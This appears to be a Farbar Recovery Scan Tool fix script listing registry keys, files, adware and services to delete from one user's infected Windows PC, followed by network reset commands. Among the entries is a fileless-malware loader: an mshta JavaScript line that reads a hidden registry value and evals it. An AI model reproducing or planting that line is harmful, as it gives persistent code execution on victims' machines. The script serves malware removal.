CloseProcesses: CreateRestorePoint: CustomCLSID: HKU\S-1-5-21-1231050607-2223395895-1768608861-1000_Classes\CLSID\{0507EEDE-3AE7-49c7-BF37-0EB4A62D8638}\localserver32 -> C:\Users\JHS-JJS\AppData\Roaming\Google\Google Talk\googletalk.exe (Google) CustomCLSID: HKU\S-1-5-21-1231050607-2223395895-1768608861-1000_Classes\CLSID\{33b07fd4-5917-43e1-968d-4c79231836bf}\localserver32 -> C:\Users\JHS-JJS\AppData\Roaming\Google\Google Talk\googletalk.exe (Google) CustomCLSID: HKU\S-1-5-21-1231050607-2223395895-1768608861-1000_Classes\CLSID\{355EC88A-02E2-4547-9DEE-F87426484BD1}\InprocServer32 -> C:\Users\JHS-JJS\AppData\Local\Google\Update\1.3.23.9\psuser_64.dll => No File CustomCLSID: HKU\S-1-5-21-1231050607-2223395895-1768608861-1000_Classes\CLSID\{590C4387-5EBD-4D46-8A84-CD0BA2EF2856}\InprocServer32 -> C:\Users\JHS-JJS\AppData\Local\Google\Update\1.3.30.3\psuser_64.dll => No File CustomCLSID: HKU\S-1-5-21-1231050607-2223395895-1768608861-1000_Classes\CLSID\{793EE463-1304-471C-ADF1-68C2FFB01247}\InprocServer32 -> C:\Users\JHS-JJS\AppData\Local\Google\Update\1.3.29.5\psuser_64.dll => No File CustomCLSID: HKU\S-1-5-21-1231050607-2223395895-1768608861-1000_Classes\CLSID\{A8F086C3-2497-4229-82FE-586F2D326F95}\localserver32 -> C:\Users\JHS-JJS\AppData\Roaming\Google\Google Talk\googletalk.exe (Google) CustomCLSID: HKU\S-1-5-21-1231050607-2223395895-1768608861-1000_Classes\CLSID\{CC182BE1-84CE-4A57-B85C-FD4BBDF78CB2}\InprocServer32 -> C:\Users\JHS-JJS\AppData\Local\Google\Update\1.3.29.1\psuser_64.dll => No File CustomCLSID: HKU\S-1-5-21-1231050607-2223395895-1768608861-1000_Classes\CLSID\{D1EDC4F5-7F4D-4B12-906A-614ECF66DDAF}\InprocServer32 -> C:\Users\JHS-JJS\AppData\Local\Google\Update\1.3.28.15\psuser_64.dll => No File HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\mcmscsvc => ""="Service" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MCODS => ""="Service" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mcmscsvc => ""="Service" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MCODS => ""="Service" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MpfService => ""="Service" HKLM\...\cmdfile\DefaultIcon: %SystemRoot%\System32\shell32.dll,-153 <===== ATTENTION HKU\S-1-5-21-1231050607-2223395895-1768608861-1000\Software\Classes\46bb36: "C:\Windows\system32\mshta.exe" "javascript:JuJWx1="H";J1I8=new ActiveXObject("WScript.Shell");O9xZdAbO="msF";D8dwB=J1I8.RegRead("HKCU\\software\\tipm\\igbespedi");Nzqpd2a="y2v1QG";eval(D8dwB);PFf8KK2H="ovZ";" <===== ATTENTION HKU\S-1-5-21-1231050607-2223395895-1768608861-1000\...\Run: [**njop<*>] => "C:\Users\JHS-JJS\AppData\Local\b263cb\84e7ae.lnk" <===== ATTENTION (Value Name with invalid characters) HKU\S-1-5-21-1231050607-2223395895-1768608861-1000\...\MountPoints2: {5c7703ed-05b0-11de-9b6c-00038a000015} - M:\LaunchU3.exe HKU\S-1-5-21-1231050607-2223395895-1768608861-1000\...\MountPoints2: {8817984c-e0b8-11e2-928d-00038a000015} - L:\VZW_Software_upgrade_assistant_installer.exe ShellIconOverlayIdentifiers: [GDriveSharedOverlay] -> {81539FE6-33C7-4CE7-90C7-1C7B8F2F2D44} => No File HKU\S-1-5-21-1231050607-2223395895-1768608861-1000\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.msn.com/?ocid=EIE9HP&PC=UP50 SearchScopes: HKLM-x32 -> {443789B7-F39C-4b5c-9287-DA72D38F4FE6} URL = hxxp://search.aol.com/aolcom/search?query={searchTerms}&invocationType=tb50TB50CLie7 SearchScopes: HKLM-x32 -> {AFBCB7E0-F91A-4951-9F31-58FEE57A25C4} URL = hxxp://www.ask.com/web?&o=101881&l=dis&q={SEARCHTERMS} SearchScopes: HKLM-x32 -> {D943EABA-8E9F-40BE-861D-26636C0303F1} URL = hxxp://search.aol.com/aolcom/search?query={searchTerms}&invocationType=msie70a SearchScopes: HKU\.DEFAULT -> {AFBCB7E0-F91A-4951-9F31-58FEE57A25C4} URL = hxxp://www.ask.com/web?&o=101881&l=dis&q={SEARCHTERMS} SearchScopes: HKU\S-1-5-19 -> {AFBCB7E0-F91A-4951-9F31-58FEE57A25C4} URL = hxxp://www.ask.com/web?&o=101881&l=dis&q={SEARCHTERMS} SearchScopes: HKU\S-1-5-20 -> {AFBCB7E0-F91A-4951-9F31-58FEE57A25C4} URL = hxxp://www.ask.com/web?&o=101881&l=dis&q={SEARCHTERMS} SearchScopes: HKU\S-1-5-21-1231050607-2223395895-1768608861-1000 -> {443789B7-F39C-4b5c-9287-DA72D38F4FE6} URL = hxxp://search.aol.com/aolcom/search?query={searchTerms}&invocationType=tb50TB50CLie7 SearchScopes: HKU\S-1-5-21-1231050607-2223395895-1768608861-1000 -> {6A1806CD-94D4-4689-BA73-E35EA1EA9990} URL = SearchScopes: HKU\S-1-5-21-1231050607-2223395895-1768608861-1000 -> {AFBCB7E0-F91A-4951-9F31-58FEE57A25C4} URL = hxxp://www.ask.com/web?&o=101881&l=dis&q={SEARCHTERMS} BHO-x32: No Name -> {02478D38-C3F9-4efb-9B51-7695ECA05670} -> No File BHO-x32: No Name -> {5C255C8A-E604-49b4-9D64-90988571CECB} -> No File Toolbar: HKU\S-1-5-21-1231050607-2223395895-1768608861-1000 -> No Name - {2318C2B1-4965-11D4-9B18-009027A5CD4F} - No File Toolbar: HKU\S-1-5-21-1231050607-2223395895-1768608861-1000 -> No Name - {40D41A8B-D79B-43D7-99A7-9EE0F344C385} - No File Toolbar: HKU\S-1-5-21-1231050607-2223395895-1768608861-1000 -> No Name - {21FA44EF-376D-4D53-9B0F-8A89D3229068} - No File CHR Extension: (Wajam) - C:\Users\JHS-JJS\AppData\Local\Google\Chrome\User Data\Default\Extensions\jpmbfleldcgkldadpdinhjjopdfpjfjp [2013-11-15] [UpdateUrl: hxxp://www.wajam.com/update/Chrome/chrome_addon_updates.xml] <==== ATTENTION S3 IpInIp; system32\DRIVERS\ipinip.sys [X] C:\Users\JHS-JJS\epson12578.exe C:\Users\JHS-JJS\garmin_rmu_cnnant2010_20.exe C:\Users\JHS-JJS\gimp-2.6.6-i686-setup.exe C:\Users\JHS-JJS\Install_AIM.exe C:\Users\JHS-JJS\MorphVOXPro4_Install-1.exe CMD: bitsadmin /reset /allusers CMD: netsh winsock reset catalog CMD: ipconfig /flushdns RemoveProxy: hosts: Emptytemp: